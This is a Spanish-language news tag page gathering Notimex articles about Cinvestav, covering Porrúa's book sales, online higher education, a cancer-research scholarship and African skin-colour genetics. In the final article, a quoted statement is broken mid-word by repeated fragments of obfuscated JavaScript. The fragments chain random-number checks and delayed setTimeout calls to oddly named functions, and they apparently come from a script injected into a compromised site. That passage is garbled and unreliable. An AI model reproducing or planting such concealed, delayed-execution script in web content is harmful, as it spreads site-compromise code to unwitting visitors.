Etiquetas: Cinvestav


Interés por el libro impreso aumenta en México, asegura Porrúa

16 mayo, 2018

México. El libro impreso y el electrónico conviven armónicamente en México, hay quien prefiere el de papel, por su aroma y textura, y otros el digital, por la facilidad de llevar muchos títulos en un dispositivo móvil, los libreros tienen la obligación de dar al lector el contenido en el formato que él quiera.

Nunca como hoy ha habido tanto interés en México por el libro impreso, nunca ha habido tantos autores en activo como hoy, ni tantos temas en las librerías. “Estoy optimista por la realidad que vive el libro impreso en este país, aunque en términos fiscales hay regímenes que se deben cambiar y hace falta un mayor número de librerías en el territorio nacional”.

Así se expresó Rodrigo Pérez Porrúa, director comercial de Grupo Porrúa y Presidente de la Asociación de Librerías de México, A. C. (ALMAC), al informar que en el periodo del 1 de enero de 2017 al 31 de diciembre del mismo año, el público de librería Porrúa sólo adquirió un 1.1 % de los títulos digitales, mientras adquirió el 99% de libros físicos.

“Tenemos el libro tradicional en todas nuestra sucursales del país, y a partir de la alianza con Kobo, tenemos también la oferta del libro electrónico tanto del fondo de Editorial Porrúa, como de todas las editoriales que se publican en idioma español. La venta sigue creciendo, porque hay interés en la lectura, pero a la par de ello, crece la piratería”, anotó.

Rodrigo Pérez Porrúa firmó hace un par de años, con Gandhi y la empresa canadiense de lectura digital Kobo, un convenio para lanzar Orbile, plataforma de lectura electrónica que reúne más de cuatro millones de libros digitalizados, además de ofrecer aplicaciones para teléfonos inteligentes y tabletas, de acuerdo con lo informado por Editorial Porrúa.

Mencionó que el fortalecimiento del crecimiento informal, es decir, de la piratería, pone de manifiesto que sí hay mucho interés de la población por la lectura y por acercarse a los libros. Al mismo tiempo, Pérez Porrúa lamentó que en toda la geografía nacional existan pocas librerías, “que son los vínculos naturales entre los libros y los lectores de México”.

Anualmente, como empresa editorial, Porrúa lanza al mercado entre 900 y mil títulos. Por fortuna, subrayó, el catálogo de las librerías Porrúa ha crecido constantemente y ha dado entrada a géneros más allá de sus colecciones emblemáticas como “Sepan Cuantos”, y la “Biblioteca Jurídica”, sin duda, la más importante en su tipo en toda América Latina.

“Literatura universal, historia, filosofía han sido los temas pilares de esa casa, a los que se han sumado infantiles como la colección “Gusano de luz” que año con año crece y ya lleva alrededor de 80 títulos publicados. Entremos en otros géneros sin dejar de atender a los que ya tenemos, como son los escolares, sagas juveniles, y de desarrollo humano.

Jóvenes y adultos siguen buscando a los clásicos como “El periquillo Sarniento”, “Los de abajo”, “La raza cósmica”, “Tlacaelel”, lecturas obligadas en secundarias y preparatorias. Autores como Juan Rulfo, Miguel de Cervantes y Gabriel García Márquez son imprescindibles en una librería. “¿Los nuevos autores? no se ven opacados por ellos”.

Las autoras no superan a sus colegas masculinos. “Quizá se debe a que se ha dado mayor visibilidad a los hombres. Por ejemplo: ¿cuántos premios literarios llevan el nombre de una autora? A pesar de esto, hay muchas escritoras con excelente pluma, como Fernanda Melchor, Clarice Lispector o Rosario Castellanos, muy solicitadas por nuestros lectores”.

La permanencia y éxito de Grupo Porrúa (Editorial y Librería), obedecen al amor que le tienen sus trabajadores. En 1900 se estableció en la calle de San Pedro y San Pablo, (Hoy calle del Carmen), para comprar y vender libros de ocasión e interés general. En 1910 se mudó a la esquina de Argentina y Justo Sierra, donde hasta hoy despacha su Casa Matriz.

“Porrúa es una empresa que reinvierte todas sus utilidades en el negocio, y busca que sus libros sean muy accesibles para público. Todos quienes laboramos aquí somos como una gran familia, además, sabemos que la economía del país es delicada, por eso, al tiempo que nuestros libros son hechos con calidad (pliegos cocidos) los vendemos muy baratos”.

En Porrúa se conoce como “temporada alta” el inicio de los cursos escolares en todos los niveles educativos. De esa forma, los textos académicos para los diferentes grados desde preescolar hasta preparatoria registran ventas con un repunte del 100 por ciento, mientras que los libros de nivel profesional reportan, en promedio un incremento de alrededor del 50 por ciento”.

Otra temporada alta es la época de Navidad, cuando se venden títulos relacionados con temas como desarrollo humano, sagas infantiles y juveniles. Los temas de tanatología, superación personal y cómo enfrentar la soledad, también se venden más en fin de año; el 14 de febrero los lectores solicitan narrativa romántica y libros de superación personal.

En Semana Santa también se venden más libros que de costumbre. “Se buscan libros para acompañar el viaje o las vacaciones, novela gráfica, cómic, obras de actualidad y, una vez más, desarrollo humano”, dijo el entrevistado, quien conoce las dificultades que generan la piratería, el robo de libros y una ley de libro que ata a las editoriales de todo el país.

También sabe que México sí lee. Por ello, cumple su responsabilidad de llevar el libro a las manos de los lectores. Igual que hace 118 años, Rodrigo Pérez Porrúa ha sabido buscar la manera de avivar el fuego del mercado librero, partiendo de la premisa de crear lectores y, posteriormente, espacios de lectura para el público, cautivo, y nuevos adeptos.

Estas iniciativas van desde mejorar las clásicas librerías de mostrador, como Casa Matriz, ubicada en el Centro Histórico, espacios de “estante abierto” y la paradigmática Librería Itinerante, que permanece alrededor de 215 días en alguna plaza pública del país para ofertar libros de todas las editoriales, temas, autores y colores, a la población lugareña.

Además, ha creado nuevos nichos de mercado que abonan al concepto que Grupo Porrúa, por Porrúa Digital, proyecto con tecnología de vanguardia. Con esto, ha dado servicios de digitalización al Arzobispado Primado de México, la Escuela Libre de Derecho, el Centro de Investigación y de Estudios Avanzados (Cinvestav) y al periódico nacional “Excélsior”.

Las 70 librerías con que cuenta Porrúa actualmente, todas con talleres y cuentacuentos para niños y el resto de los lectores, muchas con servicio de café, y algunas incluso con bar, cumplen las expectativas de todos los públicos. “No sólo son librerías, sino espacio culturales y de entretenimiento que nos hacen llevar otros servicios y productos”, anotó.

Rodrigo Pérez Porrúa señaló que la empresa sigue adelante con su misión y espíritu de llevar arte y cultura a todos, pero el gran reto no sólo de Porrúa, sino de todas las librerías de la República, es tratar de crecer y permanecer abiertas a pesar del régimen fiscal que tienen, aunque el gobierno del país se preocupa por hacer accesible el libro para todos.

“Cuando uno compra un libro, igual que una medicina, no paga IVA. El problema es que las librerías tienen un régimen fiscal, casi único en todo el espectro de quienes pagan impuestos, en el cual no producen IVA, porque su producto de venta no lo genera, pero sí las rentas de locales, como todos los gastos de operación”.

Las librerías, que representan el eslabón más importante de la cadena productiva del libro al ser el enlace entre autores y lectores, viven esa situación fiscal que los pone en desventaja ante el resto de los empresarios del país. “La ALMAC trabaja con las instituciones del ramo para corregir esa deficiencia; sin embargo… ¡larga vida al libro impreso en papel!”, concluyó.


Crecimiento de educación en línea, más lento de lo esperado: Cinvestav

14 mayo, 2018

México. Aunque en la actualidad el 25 por ciento de la oferta universitaria en América Latina es virtual, este sistema crece más lento de lo que se esperaba, afirmó la especialista del Centro de Investigación y de Estudios Avanzados (Cinvestav), Inés Dussel , al destacar que esta modalidad también resulta costosa.

La experta del Departamento de Investigaciones Educativas del Cinvestav lamentó que en el sector educativo se considere a las tecnologías digitales sólo como baratas, compactas y eficientes.

Se deja de lado, agregó, que este aprendizaje requiere, como el analógico, trabajo, tiempo, capital, recursos materiales y simbólicos, así como estructuras organizacionales que permitan procesos con cierta permanencia y estabilidad.

La especialista fue una de las participantes en el Seminario Internacional “Opciones y desafíos en México para las Instituciones de Educación Superior ante la Sociedad Digital”, organizado por varias instituciones educativas, informó el Cinvestav en un comunicado.

En ese foro, reconoció que este sistema educativo ofrece la democratización del acceso, pero destacó que no se consideran los desafíos pedagógicos.

Dussel aseguró que la educación en línea implica no sólo recursos financieros y reorganización de los sistemas, sino también definición en los saberes para producir y hacer funcionar los nuevos sistemas.

Advirtió que es importante considerar aspectos como la fragilidad o precariedad de los sistemas informáticos y de su posible manipulación.

Los estudios en línea, precisó, prometen una experiencia ajustada a los intereses y ritmos de cada uno de los interesados, así como cursos hechos a la medida y con contenidos significativos.

En ese sentido, afirmó que los objetivos pedagógicos de las nuevas plataformas no se cumplen, y que pueden existir cursos masivos con un conjunto de videos con lecciones memorísticas y tradicionales centradas en la información y poco interesadas en la compresión significativa.

Inés Dussel aseguró que los cursos automatizados necesitan en algún momento tutores humanos altamente capacitados para resolver los problemas que el software no puede hacer.

“La universidad no es una fábrica de conocimientos, es una institución que cumple funciones educativas específicas de formación de profesionales que contribuyan a un desarrollo económico, cultural y cívico del país”, destacó.

Consideró que en este modelo educativo tampoco se consideran los costos humanos y materiales para las nuevas formas de trabajo, ya que por un lado pareciera que se ahorra tiempo con la automatización pero no queda claro cuál es la función de los profesores.

Fuente: Notimex


Retos de universidades adaptarse a nueva era digital

3 mayo, 2018

México. El secretario general de la Unión de Universidades de América Latina y el Caribe (UDUAL), Roberto Escalante, afirmó que uno de los retos de las universidades es realizar cambios en sus esquemas para adaptarse a la nueva era digital.

En la presentación del seminario internacional “Opciones y desafíos en México para las Instituciones de Educación Superior ante la sociedad digital”, el funcionario dijo que el desafío no es fácil ya que las instituciones no cambian rápido porque son aparatos complejos con una inercia establecida.

“De ahí que el seminario es oportuno para dejar en claro que las cosas tienen que cambiar mucho más rápido y así las universidades puedan enfrentar las nuevas realidades”, expresó el también integrante de la Academia Mexicana de Ciencias (AMC).

El seminario se llevará a cabo los días 8 y 9 de mayo en la Rectoría General de la Universidad Autónoma Metropolitana (UAM).

Por su parte, el investigador del Centro de Investigación y de Estudios Avanzados (Cinvestav), Ricardo Félix Grijalva, indicó que el mundo ha cambiado con las tecnologías digitales, y que tanto las universidades como las instituciones de educación superior y los centros de investigación deben adecuarse a ellas.

Para lo anterior, es indispensable tener un diagnóstico sobre la educación superior ante la sociedad digital y a partir de ello plantear una estrategia concreta, añadió el investigador de acuerdo con un comunicado de la AMC.

A su vez, Germán Álvarez Mendiola, investigador del Cinvestav, comentó que la sociedad digital está presente en México y en todos los dominios de la actividad humana, incluyendo las instituciones de educación superior.

No obstante, apuntó, está presente de manera desigual en materia de recursos y regiones, de personal calificado; además, los usos que tienen todas estas tecnologías son diferentes.

“Lo que tenemos que pensar es cómo preparar a los profesores en los diversos temas de la sociedad digital, cómo mejorar los currículos y cómo diseñar, en caso de ser necesario, nuevas carreras”, abundó.

Ante estas posturas, el coordinador general del Foro Consultivo, Científico y Tecnológico (FCCyT), José Franco, explicó que uno de los objetivos del seminario es discutir temas como la robotización o la automatización en los sectores productivos y en otros como el sector salud.

Coincidió con los integrantes del presídium en que el crecimiento de las tecnologías de la información y el cómputo es exponencial en todos los sectores de la sociedad, pero existe un déficit de capital humano capacitado en estas áreas.

“Para el 2030 va a costar lo mismo tener seres humanos trabajando en las fábricas que tener las fabricas totalmente robotizadas, entonces para México es fundamental empezar a construir el escenario para esta transición y no perder la perspectiva de estos temas”, aseveró.

En lo que se refiere a las instituciones de educación superior, las cuales tienen su propia forma de operar, se requiere de coordinación y programas que puedan responder a las necesidades de cada región del país, añadió.

“La idea del simposio es conocer algunas de las mejores prácticas en el tema y empezar a desarrollar dentro del país una estrategia integrada que permita ver hacia el futuro, y establecer políticas públicas para enfrentar los nuevos retos”, puntualizó.

El seminario internacional “Opciones y desafíos en México para las Instituciones de Educación Superior ante la sociedad digital” es organizado por la UDUAL, el FCCyT, la Red Universidad Empresa, el Cinvestav y la UAM.

Fuente: Notimex


Becan a mexicana por estudio de anticancerígeno contra cáncer de colon

26 abril, 2018

México. Gracias a un estudio para expresar a una proteína, la lectina recombinante que demostró mantener potencial anticancerígeno contra el cáncer de colon, la mexicana y maestra en Biotecnología de Plantas, Dania Martínez Alarcón, obtuvo una beca para continuar su investigación en Europa.

El estudio y proceso que ya se encuentra en trámite de patente por el Cinvestav fue seleccionado por Glycomedicina, parte del Programa de Doctorado Conjunto Europeo Marie-Curie donde participan la Universidad de Grenoble y la Universidad de Utrecht.

El programa que convocó a estudiantes de todo el mundo con experiencia en diferentes áreas de la ciencia y donde solo 12 candidatos fueron seleccionados, aceptó el trabajo que la mexicana había desarrollado en conjunto con el Centro de Investigación y de Estudios Avanzados (Cinvestav), unidad Irapuato.

Ahora la mexicana podrá realizar una estancia de al menos seis meses en una empresa farmacéutica vinculada al proyecto, informó el centro del Instituto Politécnico Nacional (IPN).

El Programa de Doctorado Conjunto Europeo Marie-Curie forma parte de una red internacional de especialistas enfocados en el estudio de las interacciones entre carbohidratos, que tiene como finalidad desarrollar terapias experimentales y nuevos fármacos para combatir enfermedades relacionadas con el reconocimiento y alteración del patrón de glicosilación celular como cáncer, VIH o fibrosis quística.

El Cinvestav refirió que la red internacional fue fundada por la Comisión Europea de Ciencia mediante el programa de Marie Sklodowska-Curie Actions 2020 y en la actualidad se encuentra distribuida en seis países europeos.

Fuente: Notimex


Científicos identifican genes que producen distintos colores de piel 

23 octubre, 2017

México. Un grupo de científicos de la Universidad de Pensilvania, Estados Unidos, realizó una investigación mediante la cual identificó nuevas variantes genéticas asociadas con los distintos colores de piel.

Además de mostrar pistas sobre la evolución humana, el estudio también busca aclarar la existencia de una amplia gama de colores de tez e informar sobre los factores de riesgo genéticos para enfermedades como el cáncer de piel.

En el proyecto participaron más de dos mil personas del continente africano pertenecientes a diferentes grupos étnicos, publicó la revista de divulgación del Centro de Investigación y de Estudios Avanzados (Cinvestav) del Instituto Politécnico Nacional.

Para el desarrollo de esa investigación, los científicos tomaron una muestra de la parte interna de los brazos de las personas, lugar en el que la exposición al sol es mínima, con un medidor de color para conocer su reflectancia, que es la capacidad de un cuerpo de reflejar la luz que tenía su piel.

A través de este protocolo, los especialistas pudieron deducir los niveles de melanina (pigmento que determina la coloración de la piel, ojos y pelo) en la piel.

Mediante los resultados, el equipo de investigadores concluyó que la piel más oscura corresponde a una población de pastores en el este de África, y la más clara, a un grupo de cazadores-recolectores en la zona sur.

“Cuandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}o la gente piensa en el color de la piel de la gente originaria de África, la mayoría imagina un color oscuro, sin embargo, hemos demostrado que hay una gran cantidad de variaciones, que van desde una piel más blanca que la de los asiáticos, hasta la piel más oscura en todo el mundo”, expuso la genetista Sarah Tishkoff.

El grupo de científicos coincide en que el color de la piel se relaciona con la adaptación al entorno, lo que refuta la concepción actual de raza.

De acuerdo con la investigación, la piel blanca también apareció en ese continente, por lo tanto no se puede decir que el color de la piel determina la raza.

Fuente: Notimex